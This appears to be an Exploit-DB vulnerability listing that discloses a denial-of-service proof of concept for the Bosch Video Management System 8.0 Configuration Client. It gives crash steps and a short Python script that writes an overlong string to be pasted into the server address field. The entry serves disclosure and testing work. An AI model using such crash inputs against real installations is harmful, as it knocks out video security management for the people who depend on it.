Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)

vendor:

Bosch Video Management System

by:

Daniel

5.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Bosch Video Management System

Affected Version From: 8

Affected Version To: 8

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro x64

2018

Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)

The exploit causes a denial of service in Bosch Video Management System 8.0 Configuration Client by causing it to crash. This is achieved by opening the Configuration Client and inputting a specific set of values in the fields. The exploit is executed through a Python script that generates a specific payload and saves it in a file called 'bosch.txt'. When this file is copied into the Configuration Client, it causes the program to crash.

Mitigation:

No official patch or mitigation is available at the moment.

Source

Exploit-DB raw data:

# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)
# Discovery by: Daniel
# Discovery Date: 2018-11-12
# Software Name: Bosch Video Management System
# Software Version: 8.0
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
# Tested on: Windows 10 Pro x64

#Make sure that during the installation of software you installed all the program features available.
#This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.

# Steps to produce the crash:
# 1.- run: dos.py
# 2.- Open bosch.txt and copy content to clipboard
# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)
# 3.- Click on 'Connection:' box and select "Address Book"
# 4.- Copy clipboard in "(Enterprise) Management Server Address:"
# 5.- write "test" in 'Username'
# 6.- Write "test" in 'Password'
# 7.- Click on 'OK'
# 8.- Crash


#!/usr/bin/python

buf = "\x41" * 64
f = open('bosch.txt', 'w')
f.write(buf)
f.close()